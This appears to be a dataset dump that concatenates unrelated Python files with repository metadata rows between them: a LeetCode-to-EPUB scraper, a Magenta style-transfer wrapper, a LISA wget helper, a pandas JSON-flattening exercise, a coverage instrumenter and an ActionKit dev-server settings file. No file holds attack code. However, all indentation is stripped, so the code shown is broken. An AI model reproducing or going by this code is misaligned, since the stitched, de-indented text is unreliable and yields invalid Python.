colorama.init(autoreset=True)
options = Options()
options.headless = True
# Disable Warning, Error and Info logs
# Show only fatal errors
options.add_argument("--log-level=3")
driver = webdriver.Chrome(options=options)
# Get upto which problem it is already scraped from track.conf file
completed_upto = read_tracker("track.conf")
# Load chapters list that stores chapter info
# Store chapter info
with open('chapters.pickle', 'rb') as f:
chapters = pickle.load(f)
def download(problem_num, url, title, solution_slug):
print(
Fore.BLACK + Back.CYAN + f"Fetching problem num " + Back.YELLOW + f" {problem_num} " + Back.CYAN + " with url " + Back.YELLOW + f" {url} ")
n = len(title)
try:
driver.get(url)
# Wait 20 secs or until div with id initial-loading disappears
element = WebDriverWait(driver, 20).until(
EC.invisibility_of_element_located((By.ID, "initial-loading"))
)
# Get current tab page source
html = driver.page_source
soup = bs4.BeautifulSoup(html, "html.parser")
# Construct HTML
title_decorator = '*' * n
problem_title_html = title_decorator + f'<div id="title">{title}</div>' + '\n' + title_decorator
problem_html = problem_title_html + str(
soup.find("div", {"class": "content__u3I1 question-content__JfgR"})) + '<br><br><hr><br>'
# Append Contents to a HTML file
with open("out.html", "ab") as f:
f.write(problem_html.encode(encoding="utf-8"))
# create and append chapters to construct an epub
c = epub.EpubHtml(title=title, file_name=f'chap_{problem_num}.xhtml', lang='hr')
c.content = problem_html
chapters.append(c)
# Write List of chapters to pickle file
dump_chapters_to_file(chapters)
# Update upto which the problem is downloaded
update_tracker('track.conf', problem_num)
print(
Fore.BLACK + Back.GREEN + f"Writing problem num " + Back.YELLOW + f" {problem_num} " + Back.GREEN + " with url " + Back.YELLOW + f" {url} ")
print(Fore.BLACK + Back.GREEN + " successfull ")
# print(f"Writing problem num {problem_num} with url {url} successfull")
except Exception as e:
print(Back.RED + f" Failed Writing!! {e} ")
driver.quit()
def main():
MAXIMUM_NUMBER_OF_PROBLEMS_PER_INSTANCE = int(os.environ.get("MAXIMUM_NUMBER_OF_PROBLEMS", 400))
SLEEP_TIME_PER_PROBLEM_IN_SECOND = int(os.environ.get("SLEEP_TIME_PER_PROBLEM_IN_SECOND", 5))
# Leetcode API URL to get json of problems on algorithms categories
ALGORITHMS_ENDPOINT_URL = "https://leetcode.com/api/problems/algorithms/"
# Problem URL is of format ALGORITHMS_BASE_URL + question__title_slug
# If question__title_slug = "two-sum" then URL is https://leetcode.com/problems/two-sum
ALGORITHMS_BASE_URL = "https://leetcode.com/problems/"
# Load JSON from API
algorithms_problems_json = requests.get(ALGORITHMS_ENDPOINT_URL).content
algorithms_problems_json = json.loads(algorithms_problems_json)
# List to store question_title_slug
links = []
for child in algorithms_problems_json["stat_status_pairs"]:
# Only process free problems
if not child["paid_only"]:
question__title_slug = child["stat"]["question__title_slug"]
question__article__slug = child["stat"]["question__article__slug"]
question__title = child["stat"]["question__title"]
frontend_question_id = child["stat"]["frontend_question_id"]
difficulty = child["difficulty"]["level"]
links.append(
(question__title_slug, difficulty, frontend_question_id, question__title, question__article__slug))
has_new_problems = (completed_upto != len(links) - 1)
if has_new_problems:
styles_str = "<style>pre{white-space:pre-wrap;background:#f7f9fa;padding:10px 15px;color:#263238;line-height:1.6;font-size:13px;border-radius:3px margin-top: 0;margin-bottom:1em;overflow:auto}b,strong{font-weight:bolder}#title{font-size:16px;color:#212121;font-weight:600;margin-bottom:10px}hr{height:10px;border:0;box-shadow:0 10px 10px -10px #8c8b8b inset}</style>"
with open("out.html", "ab") as f:
f.write(styles_str.encode(encoding="utf-8"))
# Sort by difficulty follwed by problem id in ascending order
links = sorted(links, key=lambda x: (x[1], x[2]))
downloaded_now = 0
try:
for i in range(completed_upto + 1, len(links)):
question__title_slug, _, frontend_question_id, question__title, question__article__slug = links[i]
url = ALGORITHMS_BASE_URL + question__title_slug
title = f"{frontend_question_id}. {question__title}"
# Download each file as html and write chapter to chapters.pickle
download(i, url, title, question__article__slug)
downloaded_now += 1
if downloaded_now == MAXIMUM_NUMBER_OF_PROBLEMS_PER_INSTANCE:
break
# Sleep for 5 secs for each problem and 2 mins after every 30 problems
if i % 30 == 0:
print(f"Sleeping 120 secs\n")
time.sleep(120)
else:
print(f"Sleeping {SLEEP_TIME_PER_PROBLEM_IN_SECOND} secs\n")
time.sleep(SLEEP_TIME_PER_PROBLEM_IN_SECOND)
finally:
# Close the browser after download
driver.quit()
try:
if has_new_problems:
epub_writer.write("Leetcode Questions.epub", "Leetcode Questions", "Anonymous", chapters)
print(Back.GREEN + "All operations successful")
else:
print(Back.GREEN + "No new problems found. Exiting")
except Exception as e:
print(Back.RED + f"Error making epub {e}")
if __name__ == "__main__":
main()
| 40.875
| 376
| 0.657034
| 843
| 6,540
| 4.888493
| 0.32503
| 0.041009
| 0.033002
| 0.018442
| 0.157001
| 0.138316
| 0.068915
| 0.068915
| 0.012618
| 0
| 0
| 0.015947
| 0.242508
| 6,540
| 159
| 377
| 41.132075
| 0.815906
| 0.166972
| 0
| 0.145631
| 0
| 0.009709
| 0.233517
| 0.096333
| 0.009709
| 0
| 0
| 0
| 0
| 1
| 0.019417
| false
| 0
| 0.15534
| 0
| 0.174757
| 0.087379
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e992f77a4ff4f3363d1bcb7a821282c7065578b8
| 4,985
|
py
|
Python
|
model/magenta_app.py
|
DesmondYuan/DeepMovement
|
b4f347f139d52c345b592bc712260fa579b6c9a8
|
[
"MIT"
] | null | null | null |
model/magenta_app.py
|
DesmondYuan/DeepMovement
|
b4f347f139d52c345b592bc712260fa579b6c9a8
|
[
"MIT"
] | null | null | null |
model/magenta_app.py
|
DesmondYuan/DeepMovement
|
b4f347f139d52c345b592bc712260fa579b6c9a8
|
[
"MIT"
] | 1
|
2020-12-31T14:44:38.000Z
|
2020-12-31T14:44:38.000Z
|
# Adapted from Magenta console commands
import os
from magenta.models.arbitrary_image_stylization import arbitrary_image_stylization_build_model as build_model
from magenta.models.image_stylization import image_utils
import numpy as np
import tensorflow.compat.v1 as tf
import tf_slim as slim
class Magenta_Model():
def __init__(self, checkpoint,
content_square_crop=False, style_square_crop=False,
style_image_size=256, content_image_size=256):
tf.disable_v2_behavior()
tf.Graph().as_default()
sess = tf.Session()
# Defines place holder for the style image.
self.style_img_ph = tf.placeholder(tf.float32, shape=[None, None, 3])
if style_square_crop:
style_img_preprocessed = image_utils.center_crop_resize_image(
style_img_ph, style_image_size)
else:
style_img_preprocessed = image_utils.resize_image(self.style_img_ph,
style_image_size)
# Defines place holder for the content image.
content_img_ph = tf.placeholder(tf.float32, shape=[None, None, 3])
if content_square_crop:
content_img_preprocessed = image_utils.center_crop_resize_image(
content_img_ph, content_image_size)
else:
content_img_preprocessed = image_utils.resize_image(
content_img_ph, content_image_size)
# Defines the model.
stylized_images, _, _, bottleneck_feat = build_model.build_model(
content_img_preprocessed,
style_img_preprocessed,
trainable=False,
is_training=False,
inception_end_point='Mixed_6e',
style_prediction_bottleneck=100,
adds_losses=False)
checkpoint = tf.train.latest_checkpoint(checkpoint)
init_fn = slim.assign_from_checkpoint_fn(checkpoint, slim.get_variables_to_restore())
sess.run([tf.local_variables_initializer()])
init_fn(sess)
self.sess = sess
self.stylized_images = stylized_images
self.content_img_preprocessed = content_img_preprocessed
self.style_img_preprocessed = style_img_preprocessed
self.content_img_ph = content_img_ph
self.bottleneck_feat = bottleneck_feat
def process_data(self, style_images_paths, content_images_paths):
# Gets the list of the input images.
style_img_list = tf.gfile.Glob(style_images_paths)
content_img_list = tf.gfile.Glob(content_images_paths)
for content_i, content_img_path in enumerate(content_img_list):
content_img_np = image_utils.load_np_image_uint8(content_img_path)[:, :, :3]
content_img_name = os.path.basename(content_img_path)[:-4]
# Saves preprocessed content image.
inp_img_croped_resized_np = self.sess.run(
self.content_img_preprocessed, feed_dict={
self.content_img_ph: content_img_np})
# Computes bottleneck features of the style prediction network for the
# identity transform.
identity_params = self.sess.run(
self.bottleneck_feat, feed_dict={self.style_img_ph: content_img_np})
for style_i, style_img_path in enumerate(style_img_list):
style_img_name = os.path.basename(style_img_path)[:-4]
style_image_np = image_utils.load_np_image_uint8(style_img_path)[:, :, :3]
self.content_img_np = content_img_np
self.style_image_np = style_image_np
self.identity_params = identity_params
self.style_img_name = style_img_name
self.content_img_name = content_img_name
def run(self, output_dir, interpolation_weights):
style_params = self.sess.run(
self.bottleneck_feat, feed_dict={self.style_img_ph: self.style_image_np})
for interp_i, wi in enumerate(interpolation_weights):
stylized_image_res = self.sess.run(
self.stylized_images,
feed_dict={
self.bottleneck_feat:
self.identity_params * (1 - wi) + style_params * wi,
self.content_img_ph:
self.content_img_np
})
# Saves stylized image.
image_utils.save_np_image(
stylized_image_res,
os.path.join(output_dir, '%s_stylized_%s_%d.jpg' % \
(self.content_img_name, self.style_img_name, interp_i)))
magenta_model = Magenta_Model("/mnt/disks/ssd_disk/final/models/",
content_square_crop=False, style_square_crop=False,
style_image_size=256, content_image_size=256)
magenta_model.process_data(style_images_paths="/mnt/disks/ssd_disk/final/data/content_images/*",
content_images_paths="/mnt/disks/ssd_disk/final/data/content_images/*")
magenta_model.run("/mnt/disks/ssd_disk/final/tmp/", [0., 1.])
| 39.88
| 109
| 0.664995
| 626
| 4,985
| 4.886581
| 0.215655
| 0.091533
| 0.04119
| 0.026152
| 0.366133
| 0.270677
| 0.218045
| 0.199738
| 0.147761
| 0.147761
| 0
| 0.008931
| 0.258776
| 4,985
| 124
| 110
| 40.201613
| 0.818945
| 0.064594
| 0
| 0.069767
| 0
| 0
| 0.039974
| 0.038255
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034884
| false
| 0
| 0.069767
| 0
| 0.116279
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e99385b476437e2b2258af182121e6b707636676
| 4,781
|
py
|
Python
|
lisa/base_tools/wget.py
|
anirudhrb/lisa
|
fe009802577c81e45ca2ff5a34d353878caa725d
|
[
"MIT"
] | 48
|
2018-05-19T17:46:34.000Z
|
2020-09-28T21:09:06.000Z
|
lisa/base_tools/wget.py
|
anirudhrb/lisa
|
fe009802577c81e45ca2ff5a34d353878caa725d
|
[
"MIT"
] | 1,261
|
2018-05-17T04:32:22.000Z
|
2020-11-23T17:29:13.000Z
|
lisa/base_tools/wget.py
|
anirudhrb/lisa
|
fe009802577c81e45ca2ff5a34d353878caa725d
|
[
"MIT"
] | 133
|
2018-05-15T23:12:14.000Z
|
2020-11-13T10:37:49.000Z
|
import re
from pathlib import PurePosixPath
from typing import TYPE_CHECKING, Optional, Type
from lisa.executable import Tool
from lisa.tools.ls import Ls
from lisa.tools.mkdir import Mkdir
from lisa.tools.powershell import PowerShell
from lisa.tools.rm import Rm
from lisa.util import LisaException, is_valid_url
if TYPE_CHECKING:
from lisa.operating_system import Posix
class Wget(Tool):
__pattern_path = re.compile(
r"([\w\W]*?)(-|File) (‘|')(?P<path>.+?)(’|') (saved|already there)"
)
@property
def command(self) -> str:
return "wget"
@property
def can_install(self) -> bool:
return True
def install(self) -> bool:
posix_os: Posix = self.node.os # type: ignore
posix_os.install_packages([self])
return self._check_exists()
def get(
self,
url: str,
file_path: str = "",
filename: str = "",
overwrite: bool = True,
executable: bool = False,
sudo: bool = False,
force_run: bool = False,
timeout: int = 600,
) -> str:
is_valid_url(url)
# combine download file path
# TODO: support current lisa folder in pathlib.
# So that here can use the corresponding path format.
if file_path:
# create folder when it doesn't exist
self.node.shell.mkdir(PurePosixPath(file_path), exist_ok=True)
download_path = f"{file_path}/{filename}"
else:
download_path = f"{self.node.working_path}/{filename}"
# remove existing file and dir to download again.
download_pure_path = self.node.get_pure_path(download_path)
if overwrite and self.node.shell.exists(download_pure_path):
self.node.shell.remove(download_pure_path, recursive=True)
command = f"'{url}' --no-check-certificate"
if filename:
command = f"{command} -O {download_path}"
else:
command = f"{command} -P {download_path}"
command_result = self.run(
command,
no_error_log=True,
shell=True,
sudo=sudo,
force_run=force_run,
timeout=timeout,
)
matched_result = self.__pattern_path.match(command_result.stdout)
if matched_result:
download_file_path = matched_result.group("path")
else:
raise LisaException(
f"cannot find file path in stdout of '{command}', it may be caused "
" due to failed download or pattern mismatch."
f" stdout: {command_result.stdout}"
)
actual_file_path = self.node.execute(
f"ls {download_file_path}", shell=True, sudo=sudo
)
if actual_file_path.exit_code != 0:
raise LisaException(f"File {actual_file_path} doesn't exist.")
if executable:
self.node.execute(f"chmod +x {actual_file_path}", sudo=sudo)
return actual_file_path.stdout
def verify_internet_access(self) -> bool:
try:
result = self.get("https://www.azure.com", force_run=True)
if result:
return True
except Exception as e:
self._log.debug(
f"Internet is not accessible, exception occurred with wget {e}"
)
return False
@classmethod
def _windows_tool(cls) -> Optional[Type[Tool]]:
return WindowsWget
class WindowsWget(Wget):
@property
def command(self) -> str:
return ""
def _check_exists(self) -> bool:
return True
def get(
self,
url: str,
file_path: str = "",
filename: str = "",
overwrite: bool = True,
executable: bool = False,
sudo: bool = False,
force_run: bool = False,
timeout: int = 600,
) -> str:
ls = self.node.tools[Ls]
fullpath = f"{file_path}\\{filename}"
# return if file exists and not overwrite
if ls.path_exists(file_path, sudo=sudo) and not overwrite:
self._log.debug(
f"File {fullpath} already exists and rewrite is set to False"
)
# create directory if it doesn't exist
self.node.tools[Mkdir].create_directory(file_path, sudo=sudo)
# TODO: add support for executables
# remove existing file if present and download
self.node.tools[Rm].remove_file(fullpath, sudo=sudo)
self.node.tools[PowerShell].run_cmdlet(
f"$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri '{url}'"
f" -OutFile '{fullpath}'",
sudo=sudo,
force_run=force_run,
timeout=timeout,
)
return fullpath
| 31.453947
| 87
| 0.590253
| 570
| 4,781
| 4.803509
| 0.282456
| 0.049671
| 0.025566
| 0.017531
| 0.185172
| 0.153397
| 0.115413
| 0.115413
| 0.087655
| 0.087655
| 0
| 0.002126
| 0.311232
| 4,781
| 151
| 88
| 31.662252
| 0.829335
| 0.078854
| 0
| 0.338843
| 0
| 0
| 0.159344
| 0.03369
| 0
| 0
| 0
| 0.006623
| 0
| 1
| 0.07438
| false
| 0
| 0.082645
| 0.041322
| 0.264463
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e995e4148b59ca5a7b4ba1e5e2c168dedb8fd4e8
| 1,787
|
py
|
Python
|
Datacamp Assignments/Data Engineer Track/2. Streamlined Data Ingestion with pandas/35_handle_deeply_nested_data.py
|
Ali-Parandeh/Data_Science_Playground
|
c529e9b3692381572de259e7c93938d6611d83da
|
[
"MIT"
] | null | null | null |
Datacamp Assignments/Data Engineer Track/2. Streamlined Data Ingestion with pandas/35_handle_deeply_nested_data.py
|
Ali-Parandeh/Data_Science_Playground
|
c529e9b3692381572de259e7c93938d6611d83da
|
[
"MIT"
] | null | null | null |
Datacamp Assignments/Data Engineer Track/2. Streamlined Data Ingestion with pandas/35_handle_deeply_nested_data.py
|
Ali-Parandeh/Data_Science_Playground
|
c529e9b3692381572de259e7c93938d6611d83da
|
[
"MIT"
] | 1
|
2021-03-10T09:40:05.000Z
|
2021-03-10T09:40:05.000Z
|
# Load other business attributes and set meta prefix
from pandas.io.json import json_normalize
flat_cafes = json_normalize(data["businesses"],
sep="_",
record_path="categories",
meta=['name',
'alias',
'rating',
['coordinates', 'latitude'],
['coordinates', 'longitude']],
meta_prefix='biz_')
# View the data
print(flat_cafes.head())
'''
<script.py> output:
alias title biz_name biz_alias biz_rating biz_coordinates_latitude biz_coordinates_longitude
0 coffee Coffee & Tea White Noise white-noise-brooklyn-2 4.5 40.689358 -73.988415
1 coffee Coffee & Tea Devocion devocion-brooklyn-3 4.0 40.688570 -73.983340
2 coffeeroasteries Coffee Roasteries Devocion devocion-brooklyn-3 4.0 40.688570 -73.983340
3 cafes Cafes Devocion devocion-brooklyn-3 4.0 40.688570 -73.983340
4 coffee Coffee & Tea Coffee Project NY coffee-project-ny-new-york 4.5 40.726990 -73.989220
Naming meta columns can get tedious for datasets with many attributes,
and code is susceptible to breaking if column names or nesting levels change.
In such cases, you may have to write a custom function and
employ techniques like recursion to handle the data.
'''
| 52.558824
| 154
| 0.493005
| 179
| 1,787
| 4.837989
| 0.553073
| 0.04157
| 0.051963
| 0.086605
| 0.148961
| 0.148961
| 0.148961
| 0.148961
| 0.148961
| 0.148961
| 0
| 0.100304
| 0.447678
| 1,787
| 34
| 155
| 52.558824
| 0.777102
| 0.035814
| 0
| 0
| 0
| 0
| 0.158635
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.090909
| 0
| 0.090909
| 0.090909
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9960edde95bcaeefa3f37767c2580e46bec455b
| 2,310
|
py
|
Python
|
deprecated/obsolete/src/coverinst.py
|
Anirban166/tstl
|
73dac02f084b10e1bf2f172a5d1306bb5fbd7f7e
|
[
"Apache-2.0"
] | 90
|
2015-04-07T10:26:53.000Z
|
2022-03-07T15:14:57.000Z
|
deprecated/obsolete/src/coverinst.py
|
Anirban166/tstl
|
73dac02f084b10e1bf2f172a5d1306bb5fbd7f7e
|
[
"Apache-2.0"
] | 14
|
2015-10-13T16:25:59.000Z
|
2021-01-21T18:31:03.000Z
|
deprecated/obsolete/src/coverinst.py
|
Anirban166/tstl
|
73dac02f084b10e1bf2f172a5d1306bb5fbd7f7e
|
[
"Apache-2.0"
] | 32
|
2015-04-07T10:41:29.000Z
|
2022-02-26T05:17:28.000Z
|
import sys
infn = sys.argv[1]
outfn = infn.split(".py")[0]+"_INST.py"
code = []
for l in open(infn):
code.append(l)
outf = open(outfn, 'w')
outf.write("import covertool\n")
ln = 0
inComment = False
justEnded = False
currentIndent = 0
lineIndent = 0
okChangeIndent = False
skipNext = False
doNotInstrument = ["class","def","import", "elif", "else:", "except", "}", "]", ")"]
indentChangers = ["class", "def", "if", "elif", "else:", "for", "try:", "except", "while"]
skipNextChars = [",","\\"]
conditionals = ["if","elif", "else"]
for l in code:
ln += 1
ls = l.split()
if l.find('"""') != -1:
inComment = not inComment
justEnded = True
if inComment:
outf.write(l)
continue
if justEnded:
outf.write(l)
justEnded = False
continue
lineIndent = 0
for c in l:
if c != " ":
break
else:
lineIndent += 1
instrument = False
if (lineIndent > currentIndent):
if okChangeIndent and not skipNext:
currentIndent = lineIndent
instrument = True
else:
instrument = ls != []
currentIndent = lineIndent
if (ls != []) and ((ls[0] in doNotInstrument) or (ls[0][0] == "#")):
instrument = False
if (ls != []) and (ls[0] in conditionals) and (":" in l) and (ls[-1][-1] != ":"):
if ls[0] == "if":
ld = infn + ":" + str(ln)
outf.write((" " * lineIndent) + 'covertool.cover("' + ld + '")\n')
ld = infn + ":" + str(ln)+":True"
sc = l.split(":")
sct = ""
started = False
for c in sc[1]:
if started or (c != " "):
started = True
sct += c
outf.write(sc[0] + ":" + "\n")
outf.write((" " * lineIndent) + ' covertool.cover("' + ld + '")\n')
outf.write((" " * lineIndent) + " " + sct + "\n")
okChangeIndent = False
skipNext = False
continue
if instrument:
ld = infn + ":" + str(ln)
outf.write((" " * lineIndent) + 'covertool.cover("' + ld + '")\n')
okChangeIndent = skipNext or ((ls != []) and (ls[0] in indentChangers))
skipNext = (len(l) > 2) and (l[-2] in skipNextChars)
outf.write(l)
outf.close()
| 25.666667
| 90
| 0.490909
| 254
| 2,310
| 4.46063
| 0.23622
| 0.071492
| 0.067079
| 0.021183
| 0.144748
| 0.135922
| 0.11474
| 0.082966
| 0.082966
| 0.082966
| 0
| 0.013479
| 0.325541
| 2,310
| 89
| 91
| 25.955056
| 0.713736
| 0
| 0
| 0.342466
| 0
| 0
| 0.094805
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.041096
| 0
| 0.041096
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e997ebbde4fce0c730819b363c5adbce38d2664d
| 8,729
|
py
|
Python
|
actionkit_templates/settings.py
|
MoveOnOrg/actionkit-templates
|
2d06ad7634fac59e352d5cd8625f3092624d30e4
|
[
"Unlicense",
"MIT"
] | 8
|
2016-11-29T07:34:04.000Z
|
2021-06-09T18:09:25.000Z
|
actionkit_templates/settings.py
|
MoveOnOrg/actionkit-templates
|
2d06ad7634fac59e352d5cd8625f3092624d30e4
|
[
"Unlicense",
"MIT"
] | 12
|
2016-12-06T17:24:58.000Z
|
2022-02-21T20:11:47.000Z
|
actionkit_templates/settings.py
|
MoveOnOrg/actionkit-templates
|
2d06ad7634fac59e352d5cd8625f3092624d30e4
|
[
"Unlicense",
"MIT"
] | 4
|
2016-12-25T11:16:34.000Z
|
2020-02-11T18:48:26.000Z
|
import json
import os
import sys
import time
try:
from urlparse import urlparse
except ImportError:
# python3
from urllib.parse import urlparse
from django.conf.urls import url
from django.conf.urls.static import static
from django.http import HttpResponse, Http404
from django.shortcuts import render_to_response, redirect
from django.template.loader import render_to_string
from django.template.base import add_to_builtins
from django.views.static import serve
from .moveon_fakeapi import mo_event_data
"""
try running with
aktemplates runserver 0.0.0.0:1234
"""
DEBUG = True
SECRET_KEY = 'who cares!'
INSTALLED_APPS = ['actionkit_templates', ]
try:
import template_debug #django-template-debug
INSTALLED_APPS.append('template_debug')
import django_extensions #django-extensions
INSTALLED_APPS.append('django_extensions')
except:
pass
#one directory down
APP_PATH = os.path.dirname(__file__)
PROJECT_ROOT_PATH = os.path.abspath(os.getcwd())
#############
# STATIC DIRECTORY
#############
#note this only works if DEBUG=True
STATIC_ROOT = os.environ.get('STATIC_ROOT', os.path.join(PROJECT_ROOT_PATH, './static'))
STATIC_URL = os.environ.get('STATIC_URL', '/static/')
STATIC_FALLBACK = os.environ.get('STATIC_FALLBACK', False)
STATIC_LOCAL = os.environ.get('STATIC_URL', None) # an explicit local or not
#############
# TEMPLATES
#############
DEFAULT_TEMPLATES = os.path.join(APP_PATH, 'templates')
DIR_TEMPLATES = []
if os.environ.get('TEMPLATE_DIR'):
DIR_TEMPLATES.append(os.environ.get('TEMPLATE_DIR'))
else:
for d in ('./', './template_set', './_layouts', './_includes'):
dd = os.path.join(PROJECT_ROOT_PATH, d)
if os.path.exists(dd):
DIR_TEMPLATES.append(dd)
DIR_TEMPLATES.append(DEFAULT_TEMPLATES)
TEMPLATES = [
{ 'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': DIR_TEMPLATES,
},
]
MIDDLEWARE_CLASSES = []
add_to_builtins('actionkit_templates.templatetags.actionkit_tags')
def _get_context_data(request, name=None, page=None, use_referer=False):
from actionkit_templates.contexts.page_contexts import contexts
port = '4000'
hostport = request.get_host().split(':')
if len(hostport) > 1:
port = hostport[1]
if use_referer:
paths = None
if request.META.get('HTTP_REFERER'):
paths = urlparse(request.META['HTTP_REFERER']).path.split('/')
elif request.GET.get('path'):
# e.g. &path=/events/event_search.html
paths = request.GET['path'].split('/')
if paths and len(paths) > 1:
name = paths[1]
if len(paths) > 2:
page = paths[2]
custom_contexts_file = os.path.join(PROJECT_ROOT_PATH,
os.environ.get('CUSTOM_CONTEXTS', 'contexts.json'))
if os.path.exists(custom_contexts_file):
try:
contexts.update({'Custom': json.loads(open(custom_contexts_file).read())})
except ValueError as e:
raise Exception("JSON Parsing Error for context file %s %s" % (
custom_contexts_file, e.message))
#first use ?template= if there, otherwise name's template, otherwise homepage
cxt = dict(
devenv={
'enabled': True,
'port': port,
'STATIC_URL': STATIC_URL,
'STATIC_LOCAL': STATIC_LOCAL,
'MO_EVENTS_API': '/fake/api/events'
}
)
context_data = contexts.get(name, {})
if page:
context_data = contexts.get(name, {}).get(page, {})
cxt.update(context_data)
if not context_data:
sections = []
for section, pages in sorted(contexts.items()):
sections.append([section, sorted(pages.items())])
cxt.update({
'page': {'title':'Homepage'},
'pagelinks': sections})
if request.GET.get('user_id'):
#for debugging tests based on user.id % 2, e.g.
context_data.setdefault('user', {}).update({'id': int(request.GET.get('user_id'))})
args = cxt.get('args', {}).copy()
args.update(request.GET.dict())
cxt['args'] = args
if 'akid' not in cxt:
cxt['akid'] = cxt['args'].get('akid')
cxt['request'] = request
cxt['js_context'] = '""' # FUTURE: what should go in here?
return cxt
#############
# HOME PAGE TEST
#############
def index(request, name, page=None):
cxt = _get_context_data(request, name, page)
template = request.GET.get('template',
cxt.get('filename', "homepagetest.html"))
return render_to_response(template, cxt)
def login_context(request):
cxt = _get_context_data(request, use_referer=True)
from actionkit_templates.contexts.event_context_json import event_json
event_json_copy = event_json.copy()
coming_from = request.GET.get('url','')
if 'event' in coming_from \
or 'logged_in' in coming_from \
or 'survey_logged_in' in coming_from:
if not request.GET.get('login') and 'survey_logged_in' not in coming_from:
del event_json_copy['name']
return HttpResponse(
'actionkit.forms.onContextLoaded(%s)' % json.dumps(event_json_copy))
elif cxt.get('context'):
return HttpResponse('actionkit.forms.onContextLoaded(%s)' % json.dumps(cxt['context']))
else:
return HttpResponse(
#text key has all the generic error messages
'actionkit.forms.onContextLoaded({"text": %s})' % json.dumps(event_json['text']))
def user_password_forgot(request):
return HttpResponse('unimplemented')
def logout(request):
if request.GET.get('next'):
return redirect(request.GET.get('next'))
return redirect('/logout.html')
def event_search_results(request, page):
cxt = _get_context_data(request, 'events', 'WILL_USE_REFERER_HEADER', use_referer=True)
# special query results context:
all = cxt['args'].get('all') == '1'
cxt.update({'all': all})
if cxt.get('SLOW_SEARCH'):
# This allows us to test for race conditions
time.sleep(2)
search_results = render_to_string('event_search_results.html', cxt)
return HttpResponse('actionkit.forms.onEventSearchResults({})'
.format(json.dumps(search_results)))
def event_api_moveon_fake(request):
"""Fake representation of MoveOn events api"""
cxt = _get_context_data(request, 'events', 'WILL_USE_REFERER_HEADER', use_referer=True)
events = cxt.get('events', [])
if cxt.get('SLOW_API'):
# This allows us to test for race conditions
time.sleep(2)
if cxt.get('500_API'):
raise Exception('Cause failure to allow graceful degradation')
search_results = [mo_event_data(evt) for evt in events]
return HttpResponse(json.dumps({'events': search_results}), content_type='application/json')
def proxy_serve(request, path, document_root=None, show_indexes=False):
try_proxy = True
try:
import requests
except ImportError:
try_proxy = False
try:
return serve(request, path, document_root, show_indexes)
except Http404:
if try_proxy:
prefix = request.path.split('/')[1]
content = requests.get('https://roboticdogs.actionkit.com/{}/{}'.format(prefix, path), verify=False)
if content.status_code == 200:
return HttpResponse(content.content, content_type=content.headers['Content-Type'])
raise Http404
#############
# URLS
#############
ROOT_URLCONF = 'actionkit_templates.settings'
urlpatterns = [
url(r'^context', login_context),
url(r'^progress', login_context, name='progress'),
url(r'^logout', logout, name="logout"),
url(r'^(?P<name>[-.\w]+)?(/(?P<page>[-.\w]+))?$', index),
url(r'^forgot/$', user_password_forgot, name='user_password_forgot'),
url(r'^cms/event/(?P<page>[-.\w]+)/search_results/', event_search_results, name='event_search_results'),
url(r'^fake/api/events', event_api_moveon_fake, name="event_api_moveon_fake"),
# ActionKit urls or {% url %} template tag:
url(r'^fake/stub/reverse', event_api_moveon_fake, name="reverse_donation"),
]
if STATIC_ROOT:
urlpatterns = (urlpatterns
+ static(STATIC_URL, document_root=STATIC_ROOT)
+ static('/resources/',
view=proxy_serve,
document_root=os.path.join(STATIC_ROOT, './resources'))
+ static('/media/',
view=proxy_serve,
document_root=os.path.join(STATIC_ROOT, './media'))
)
if os.path.exists(os.path.join(PROJECT_ROOT_PATH, 'local_settings.py')):
from local_settings import *
| 35.77459
| 112
| 0.643487
| 1,085
| 8,729
| 4.988018
| 0.235945
| 0.013304
| 0.019217
| 0.019401
| 0.186438
| 0.108278
| 0.078344
| 0.078344
| 0.05728
| 0.05728
| 0
| 0.005681
| 0.213541
| 8,729
| 243
| 113
| 35.921811
| 0.782666
| 0.069195
| 0
| 0.090909
| 0
| 0
| 0.179642
| 0.056563
| 0
| 0
| 0
| 0
| 0
| 1
| 0.042781
| false
| 0.016043
| 0.117647
| 0.005348
| 0.224599
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9a05f45a351e31a1eadb205f7bd181f6ae63473
| 2,314
|
py
|
Python
|
Mock-exams/02-Mock-exam/notes/notes/app/views.py
|
M0673N/Python-Web-Basics
|
cecc27f7a12f990756edcc8885290eb3b2e487b7
|
[
"MIT"
] | null | null | null |
